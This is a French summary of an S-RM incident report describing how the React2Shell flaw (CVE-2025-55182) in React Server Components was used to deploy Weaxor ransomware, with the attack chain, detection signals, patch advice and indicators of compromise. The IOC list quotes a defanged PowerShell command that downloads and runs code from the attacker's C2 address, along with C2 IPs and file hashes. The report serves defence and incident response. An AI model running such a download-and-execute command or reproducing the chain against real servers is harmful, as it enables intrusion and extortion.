Source: S-RM — Dans un rapport d’incident, S-RM décrit l’exploitation de la vulnérabilité critique React2Shell (CVE-2025-55182) comme vecteur d’accès initial menant au déploiement du ransomware Weaxor. Ce cas marque la première observation par S-RM de l’usage de cette faille par des acteurs à but financier pour de l’extorsion, élargissant l’impact connu au-delà des backdoors et crypto‑miners.

  • Vulnérabilité: React2Shell (CVE-2025-55182) affecte React Server Components (RSC) et le protocole Flight dans React et Next.js. Elle permet une exécution de code à distance non authentifiée via une requête HTTP malveillante, avec exécution sous l’utilisateur du processus serveur. Gravité CVSS 10.0, exploitation aisée et propice à l’automatisation 🚨.

  • Menaces et acteurs: Selon des observations initiales (AWS), des acteurs étatiques ont tenté d’exploiter la faille quelques heures après sa divulgation pour installer des portes dérobées. Des acteurs financiers ont aussi visé le minage de crypto. S-RM observe désormais l’usage par un acteur financier pour une attaque par ransomware (Weaxor), probablement automatisée et à petite échelle.

  • Chaîne d’attaque (React2Shell ➜ Weaxor): Après l’accès initial (5 déc. 2025), un PowerShell obfusqué a récupéré un stager Cobalt Strike et installé un beacon (C2). L’attaquant a désactivé la protection en temps réel de Windows Defender, puis a déposé et exécuté le binaire Weaxor en moins d’une minute. Création de notes « RECOVERY INFORMATION.txt », chiffrement des fichiers avec l’extension .weax, génération d’un fichier texte contenant l’IP publique de la cible, effacement des journaux et suppression des shadow copies. Aucun mouvement latéral ni exfiltration observés. Le même hôte a ensuite été compromis par d’autres acteurs (C2 alternatifs) avant sa mise hors ligne.

  • Détections et éléments saillants: Indicateurs d’exploitation incluant des processus cmd.exe / powershell.exe engendrés par node.exe et l’exécution de whoami. Les journaux d’accès utilisateur ont noté une connexion « File Server » depuis 127.0.0.1 associée au compte exécutant le processus vulnérable. S-RM signale aussi que les patchs initiaux (React 19.0.2, 19.1.3, 19.2.2) restent vulnérables et recommande de mettre à jour immédiatement. S-RM conseille un examen forensique des serveurs exposés précédemment vulnérables pour rechercher: connexions sortantes anormales (C2), désactivation AV/EDR, effacement/tampering des logs, pics de ressources (miners) 🛡️.

  • IOCs 🔎

    • Hôte:
      • weax.txt: fichier contenant des infos système et l’IP publique (N/A)
      • Commande PowerShell: IEX (New-Object System[.]Net[.]Webclient).DownloadString(‘http[://]23[.]235[.]188[.]3:[REDACTED]’)
      • ZQyfcAJ.exe (Weaxor) — SHA1: f6083acf5fde12d17fb5b3098242e92a48cbf122
      • Agtisx.exe (C2 d’une intrusion séparée) — SHA1: 05f4407eb2e413c3babdc3054e6db032cadc51b2
    • Réseau:
      • 23.235.188[.]3 — IP C2 utilisée dans l’attaque Weaxor
      • 193.143.1[.]153 — IP contactée par Weaxor sur le port 80
      • 45.221.113[.]96, 45.221.114[.]250, 43.156.70[.]172, 45.194.22[.]139, 38.47.103[.]117 — IP C2 associées à Agtisx.exe

  • TTPs observées (MITRE‑like) 🧩

    • Accès initial: exploitation CVE-2025-55182 (RSC/Flight, Next.js/React) via requête HTTP malveillante non authentifiée
    • Exécution: PowerShell obfusqué, stager Cobalt Strike, beacon C2
    • Évasion: désactivation de Windows Defender, effacement des journaux, suppression des VSS
    • Découverte: whoami
    • Impact: chiffrement Weaxor, .weax, notes « RECOVERY INFORMATION.txt »; pas de lateral movement ni exfiltration constatés

Cet article est un rapport d’incident documentant l’exploitation de React2Shell pour un déploiement de ransomware, avec chronologie, IOCs et signaux de détection.

🔗 Source originale : https://www.s-rminform.com/latest-thinking/react2shell-used-as-initial-access-vector-for-weaxor-ransomware-deployment